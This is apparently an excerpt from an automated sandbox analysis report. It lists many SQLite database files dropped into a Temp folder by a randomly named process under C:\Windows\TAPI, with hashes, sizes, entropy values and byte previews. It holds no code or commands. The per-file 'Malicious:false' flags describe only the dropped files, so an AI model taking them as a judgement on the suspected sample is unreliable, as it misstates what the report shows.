                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\KvQrUJtDe3

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\LKusHoWhzt

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\LTiRCAcmrf

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Lq3kejkDls

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                        Entropy (8bit):0.037963276276857943
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\M3hnqT6mUC

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\M4PtxV5glq

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\M8C0OCeSN5

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MA4SD8t84r

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MMTN6h7LRO

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MPtwnE9hJ7

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MdAwG5H3GG

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MknqeiJB2l

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MlIjsC8ZTJ

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MsBbgpRl97

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\NQTS7kDUmA

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\NZDCr4l3ok

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\O3SdrpObgf

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\O4Rr8IEjEc

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\OIGg9yFJfO

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ONpBu9lcdX

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
